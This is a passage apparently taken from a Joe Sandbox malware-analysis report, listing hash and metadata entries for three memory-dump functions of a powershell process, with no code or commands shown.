                                                    • Source File: 00000006.00000002.1913687375.00007FFB547B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB547B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_7ffb547b0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 21d5d000209f78589b074c713a51210da6fb5ac40e9f254627348caab0ec2877
                                                    • Instruction ID: 58b14f3ebf45d6794ae7ac2b8b94f2713f56df6ccb63f4a548383422aa6c500a
                                                    • Opcode Fuzzy Hash: 21d5d000209f78589b074c713a51210da6fb5ac40e9f254627348caab0ec2877
                                                    • Instruction Fuzzy Hash: A021047090CB488FDB18DBACD84A7E97BE4EB56320F04426BD049C3152DA74A81ACB92
                                                    Function 00007FFB547B33B5 Relevance: .0, Instructions: 49COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1913687375.00007FFB547B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB547B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_7ffb547b0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 36e879b52527cf9c0831b621c126732d1c6f159b4781d2086e37170df1838c7a
                                                    • Instruction ID: b2ffccaf8f91c74045b778e9e640bfb36c737b98b420af346e469a5d5e8b2a1b
                                                    • Opcode Fuzzy Hash: 36e879b52527cf9c0831b621c126732d1c6f159b4781d2086e37170df1838c7a
                                                    • Instruction Fuzzy Hash: 7D01A77010CB0C8FD744EF0CE451AA6B3E0FB85320F10052EE58AC3255DB36E882CB45
                                                    Function 00007FFB547BE6C8 Relevance: .0, Instructions: 41COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1913687375.00007FFB547B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB547B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_7ffb547b0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 214538f1104a3d6cc87061549d36a33741664488b8f61de29143335ac7a28f6b
                                                    • Instruction ID: 30fa0045b5178ee0e68b0c3b903c94fd59b9c8047b18daf03e51d8326b38429d
                                                    • Opcode Fuzzy Hash: 214538f1104a3d6cc87061549d36a33741664488b8f61de29143335ac7a28f6b
                                                    • Instruction Fuzzy Hash: 53F0F03480C6898FCB079F2488558E57BA0EF16210B0502E7E448CB1B2DB74A868CBD2